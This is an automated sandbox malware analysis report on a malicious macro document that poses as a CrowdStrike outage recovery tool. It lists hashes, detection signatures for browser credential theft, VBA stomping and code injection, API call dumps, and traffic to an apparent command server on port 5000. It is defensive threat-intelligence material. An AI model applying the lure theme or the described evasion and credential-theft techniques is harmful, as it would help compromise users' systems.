Windows Analysis Report
New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm

Overview

General Information

Sample name:	New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm
Analysis ID:	1478411
MD5:	dd2100dfa067caae416b885637adc4ef
SHA1:	499f8881f4927e7b4a1a0448f62c60741ea6d44b
SHA256:	803727ccdf441e49096f3fd48107a5fe55c56c080f46773cd649c9e55ec1be61
Tags:	docm
Infos:

Detection

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

System process connects to network (likely due to code injection or exploit)

Contains functionality to steal Chrome passwords or cookies

Document contains VBA stomped code (only p-code) potentially bypassing AV detection

Document contains an embedded VBA macro which may execute processes

Document contains an embedded VBA macro with suspicious strings

Document contains an embedded VBA with many string operations indicating source code obfuscation

Document exploit detected (process start blacklist hit)

Downloads suspicious files via Chrome

Machine Learning detection for dropped file

Office process queries suspicious COM object (likely to drop second stage)

Sigma detected: Legitimate Application Dropped Executable

Sigma detected: Suspicious Microsoft Office Child Process

Tries to harvest and steal browser information (history, passwords, etc)

Uses known network protocols on non-standard ports

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to create an SMB header

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to query network adapater information

Creates a process in suspended mode (likely to inject code)

Deletes files inside the Windows folder

Detected non-DNS traffic on DNS port

Detected potential crypto function

Document contains an embedded VBA macro which executes code when the document is opened / closed

Document contains embedded VBA macros

Document embeds suspicious OLE2 link

Document misses a certain OLE stream usually present in this Microsoft Office document type

Drops PE files

Enables debug privileges

Found decision node followed by non-executed suspicious APIs

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Suspicious Copy From or To System Directory

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Uses taskkill to terminate processes

Classification

Signatures

AV Detection

Multi AV Scanner detection for submitted file

Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm

ReversingLabs: Detection: 26%

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRC0000.tmp

Joe Sandbox ML: detected

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 13_2_008AF02B CertGetNameStringA,CertFindExtension,CryptDecodeObjectEx,	13_2_008AF02B
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 13_2_008AF820 CryptAcquireContextA,CryptCreateHash,	13_2_008AF820
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 13_2_008AF860 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,	13_2_008AF860
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 13_2_008A6400 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,	13_2_008A6400
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 13_2_008AEC10 malloc,CryptQueryObject,CertAddCertificateContextToStore,CertFreeCertificateContext,GetLastError,GetLastError,	13_2_008AEC10
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 13_2_008A6591 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,	13_2_008A6591
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 13_2_008A3EA4 _strdup,fopen,free,fseek,ftell,fread,fclose,free,free,fseek,malloc,malloc,malloc,malloc,MultiByteToWideChar,PFXImportCertStore,free,free,free,free,GetLastError,CertFindCertificateInStore,GetLastError,CertCloseStore,free,CertOpenStore,GetLastError,free,free,free,free,free,CryptStringToBinaryA,free,CertFindCertificateInStore,free,CertCloseStore,calloc,calloc,CertFreeCertificateContext,CertFreeCertificateContext,free,free,	13_2_008A3EA4
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 13_2_008AC6E0 malloc,CryptAcquireContextA,CryptCreateHash,CryptReleaseContext,	13_2_008AC6E0
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 13_2_008AC730 CryptHashData,	13_2_008AC730
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 13_2_008AC750 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,	13_2_008AC750
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C15E30 BCryptGenRandom,	16_2_00007FFD92C15E30
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92BF2210 new,CryptStringToBinaryA,delete,delete,delete,CryptStringToBinaryA,CryptUnprotectData,new,delete,delete,delete,	16_2_00007FFD92BF2210
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92BF2E60 new,new,new,std::_Lockit::_Lockit,std::_Lockit::~_Lockit,std::_Lockit::_Lockit,std::_Lockit::~_Lockit,std::_Lockit::_Lockit,std::_Lockit::~_Lockit,std::_Lockit::_Lockit,std::_Lockit::~_Lockit,BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptCloseAlgorithmProvider,BCryptGenerateSymmetricKey,BCryptDecrypt,BCryptDecrypt,BCryptCloseAlgorithmProvider,std::_Lockit::_Lockit,std::_Lockit::~_Lockit,std::_Lockit::_Lockit,std::_Lockit::~_Lockit,delete,delete,delete,delete,std::_Lockit::_Lockit,std::_Lockit::~_Lockit,	16_2_00007FFD92BF2E60
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C39500 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,	16_2_00007FFD92C39500
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C15B90 BCryptGenRandom,	16_2_00007FFD92C15B90
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C65EE0 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,	16_2_00007FFD92C65EE0
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C65E90 CryptAcquireContextA,CryptCreateHash,	16_2_00007FFD92C65E90
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C65F70 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,	16_2_00007FFD92C65F70
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C5E0B0 CertOpenStore,GetLastError,CertCreateCertificateChainuser,GetLastError,CertGetCertificateChain,GetLastError,CertFreeCertificateChainuser,CertCloseStore,CertFreeCertificateChain,CertFreeCertificateContext,CertGetNameStringA,CertFindExtension,CryptDecodeObjectEx,CertGetNameStringA,CertFindExtension,CryptDecodeObjectEx,_heap_alloc,	16_2_00007FFD92C5E0B0
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C64530 CryptAcquireContextA,CryptCreateHash,CryptReleaseContext,	16_2_00007FFD92C64530
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C645B0 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,	16_2_00007FFD92C645B0
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C645A0 CryptHashData,	16_2_00007FFD92C645A0
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C64B30 CryptAcquireContextA,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,	16_2_00007FFD92C64B30
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C5E990 CryptQueryObject,CertAddCertificateContextToStore,CertFreeCertificateContext,GetLastError,GetLastError,	16_2_00007FFD92C5E990
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C66EC0 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,	16_2_00007FFD92C66EC0
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 33_2_0087F820 CryptAcquireContextA,CryptCreateHash,	33_2_0087F820
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 33_2_0087F02B CertGetNameStringA,CertFindExtension,CryptDecodeObjectEx,	33_2_0087F02B
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 33_2_0087F860 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,	33_2_0087F860
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 33_2_00876400 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,	33_2_00876400
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 33_2_0087EC10 malloc,CryptQueryObject,CertAddCertificateContextToStore,CertFreeCertificateContext,GetLastError,GetLastError,	33_2_0087EC10
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 33_2_00876591 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,	33_2_00876591
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 33_2_00873EA4 _strdup,fopen,free,fseek,ftell,fread,fclose,free,free,fseek,malloc,malloc,malloc,malloc,MultiByteToWideChar,PFXImportCertStore,free,free,free,free,GetLastError,CertFindCertificateInStore,GetLastError,CertCloseStore,free,CertOpenStore,GetLastError,free,free,free,free,free,CryptStringToBinaryA,free,CertFindCertificateInStore,free,CertCloseStore,calloc,calloc,CertFreeCertificateContext,CertFreeCertificateContext,free,free,	33_2_00873EA4
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 33_2_0087C6E0 malloc,CryptAcquireContextA,CryptCreateHash,CryptReleaseContext,	33_2_0087C6E0
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 33_2_0087C730 CryptHashData,	33_2_0087C730
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 33_2_0087C750 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,	33_2_0087C750

Source: certutil.exe, 0000000B.00000002.2149297237.0000000004620000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_eb710474-e

Contains functionality to create an SMB header

Source: C:\Windows\System32\rundll32.exe

Code function: mov dword ptr [rbp+04h], 424D53FFh

16_2_00007FFD92C4D7E0

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown

HTTPS traffic detected: 173.222.162.64:443 -> 192.168.2.6:49772 version: TLS 1.0

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 40.126.31.69:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49727 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.6:49728 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49786 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49815 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.6:49818 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49213 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49233 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49268 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49325 version: TLS 1.2

Source:	Binary string: curl.pdb source: xcopy.exe, 0000000A.00000002.2145898386.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000B.00000002.2149297237.0000000004620000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000B.00000002.2148940386.0000000002928000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000C.00000002.2154163486.00000000028A8000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmp, curl.exe, 0000000D.00000000.2155057954.00000000008B5000.00000002.00000001.01000000.00000007.sdmp, xcopy.exe, 0000001E.00000002.2727525467.00000000028DB000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000001F.00000002.2729026809.0000000004760000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000001F.00000002.2728920488.0000000002A08000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000020.00000002.2732646936.0000000002D98000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000021.00000002.2767226008.0000000000885000.00000002.00000001.01000000.00000007.sdmp, curl.exe, 00000021.00000000.2733260752.0000000000885000.00000002.00000001.01000000.00000007.sdmp
Source:	Binary string: D:\c++\Mal_Cookie_x64\x64\Release\mscorsvc.pdb source: certutil.exe, 0000000E.00000003.2191196676.0000000004907000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.5554128263.00007FFD92CEA000.00000002.00000001.01000000.00000008.sdmp, certutil.exe, 00000022.00000003.2768980516.0000000004FA2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000024.00000002.4259710787.00007FFD92CEA000.00000002.00000001.01000000.00000008.sdmp

Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C0B230 _Bitmask_includes,operator&=,_Bitmask_includes,_Bitmask_includes,operator&=,_Bitmask_includes,GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,operator&=,std::_Fs_file::_Fs_file,Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock,_Bitmask_includes,GetFileInformationByHandleEx,GetLastError,Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock,operator&=,_Bitmask_includes,GetFileInformationByHandleEx,GetLastError,Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock,operator&=,_Bitmask_includes,GetFileInformationByHandleEx,GetLastError,Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock,operator&=,Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock,Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock,	16_2_00007FFD92C0B230
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C0B1C0 __std_fs_close_handle,FindFirstFileExW,GetLastError,	16_2_00007FFD92C0B1C0
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92BF18C0 FindFirstFileW,new,delete,delete,std::_Lockit::_Lockit,std::_Lockit::~_Lockit,delete,delete,delete,FindNextFileW,FindClose,delete,delete,	16_2_00007FFD92BF18C0
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92CCDD10 type_info::_name_internal_method,FindFirstFileExW,Concurrency::details::_Scheduler::_Scheduler,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,FindNextFileW,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,	16_2_00007FFD92CCDD10

Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\Theme Colors\
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\

Software Vulnerabilities

Document exploit detected (process start blacklist hit)

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

Process created: C:\Windows\SysWOW64\cmd.exe

Source: winword.exe

Memory has grown: Private usage: 1MB later: 100MB

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\rundll32.exe

Network Connect: 172.104.160.126 5000

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 8099
Source: unknown	Network traffic detected: HTTP traffic on port 8099 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 8099 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49802
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49803
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49805
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49807
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49808
Source: unknown	Network traffic detected: HTTP traffic on port 49809 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49809
Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49810
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49811
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49812
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49813
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 49195 -> 8099
Source: unknown	Network traffic detected: HTTP traffic on port 8099 -> 49195
Source: unknown	Network traffic detected: HTTP traffic on port 49209 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49209
Source: unknown	Network traffic detected: HTTP traffic on port 49210 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49210
Source: unknown	Network traffic detected: HTTP traffic on port 49211 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49211
Source: unknown	Network traffic detected: HTTP traffic on port 49212 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49212
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49212
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49212
Source: unknown	Network traffic detected: HTTP traffic on port 49214 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49214
Source: unknown	Network traffic detected: HTTP traffic on port 49215 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49215
Source: unknown	Network traffic detected: HTTP traffic on port 49216 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49216
Source: unknown	Network traffic detected: HTTP traffic on port 49218 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49218
Source: unknown	Network traffic detected: HTTP traffic on port 49219 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49219
Source: unknown	Network traffic detected: HTTP traffic on port 49220 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49220
Source: unknown	Network traffic detected: HTTP traffic on port 49221 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49221
Source: unknown	Network traffic detected: HTTP traffic on port 49222 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49222
Source: unknown	Network traffic detected: HTTP traffic on port 49223 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49223
Source: unknown	Network traffic detected: HTTP traffic on port 49224 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49224
Source: unknown	Network traffic detected: HTTP traffic on port 49225 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49225
Source: unknown	Network traffic detected: HTTP traffic on port 49226 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49226
Source: unknown	Network traffic detected: HTTP traffic on port 49227 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49227
Source: unknown	Network traffic detected: HTTP traffic on port 49228 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49228
Source: unknown	Network traffic detected: HTTP traffic on port 49229 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49229
Source: unknown	Network traffic detected: HTTP traffic on port 49230 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49230
Source: unknown	Network traffic detected: HTTP traffic on port 49231 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49231
Source: unknown	Network traffic detected: HTTP traffic on port 49232 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49232
Source: unknown	Network traffic detected: HTTP traffic on port 49234 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49234
Source: unknown	Network traffic detected: HTTP traffic on port 49235 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49235
Source: unknown	Network traffic detected: HTTP traffic on port 49236 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49236
Source: unknown	Network traffic detected: HTTP traffic on port 49237 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49237
Source: unknown	Network traffic detected: HTTP traffic on port 49238 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49238
Source: unknown	Network traffic detected: HTTP traffic on port 49239 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49239
Source: unknown	Network traffic detected: HTTP traffic on port 49240 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49240
Source: unknown	Network traffic detected: HTTP traffic on port 49241 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49241
Source: unknown	Network traffic detected: HTTP traffic on port 49242 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49242
Source: unknown	Network traffic detected: HTTP traffic on port 49243 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49243
Source: unknown	Network traffic detected: HTTP traffic on port 49244 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49244
Source: unknown	Network traffic detected: HTTP traffic on port 49245 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49245
Source: unknown	Network traffic detected: HTTP traffic on port 49246 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49246
Source: unknown	Network traffic detected: HTTP traffic on port 49247 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49247
Source: unknown	Network traffic detected: HTTP traffic on port 49248 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49248
Source: unknown	Network traffic detected: HTTP traffic on port 49249 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49249
Source: unknown	Network traffic detected: HTTP traffic on port 49250 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49250
Source: unknown	Network traffic detected: HTTP traffic on port 49251 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49251
Source: unknown	Network traffic detected: HTTP traffic on port 49252 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49252
Source: unknown	Network traffic detected: HTTP traffic on port 49253 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49253
Source: unknown	Network traffic detected: HTTP traffic on port 49254 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49254
Source: unknown	Network traffic detected: HTTP traffic on port 49255 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49255
Source: unknown	Network traffic detected: HTTP traffic on port 49256 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49256
Source: unknown	Network traffic detected: HTTP traffic on port 49257 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49257
Source: unknown	Network traffic detected: HTTP traffic on port 49258 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49258
Source: unknown	Network traffic detected: HTTP traffic on port 49259 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49259
Source: unknown	Network traffic detected: HTTP traffic on port 49260 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49260
Source: unknown	Network traffic detected: HTTP traffic on port 49261 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49261
Source: unknown	Network traffic detected: HTTP traffic on port 49262 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49262
Source: unknown	Network traffic detected: HTTP traffic on port 49263 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49263
Source: unknown	Network traffic detected: HTTP traffic on port 49264 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49264
Source: unknown	Network traffic detected: HTTP traffic on port 49265 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49265
Source: unknown	Network traffic detected: HTTP traffic on port 49266 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49266
Source: unknown	Network traffic detected: HTTP traffic on port 49267 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49267
Source: unknown	Network traffic detected: HTTP traffic on port 49269 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49269
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49269
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49269
Source: unknown	Network traffic detected: HTTP traffic on port 49270 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49270
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49270
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49270
Source: unknown	Network traffic detected: HTTP traffic on port 49271 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49271
Source: unknown	Network traffic detected: HTTP traffic on port 49272 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49272
Source: unknown	Network traffic detected: HTTP traffic on port 49273 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49273
Source: unknown	Network traffic detected: HTTP traffic on port 49274 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49274
Source: unknown	Network traffic detected: HTTP traffic on port 49275 -> 5000
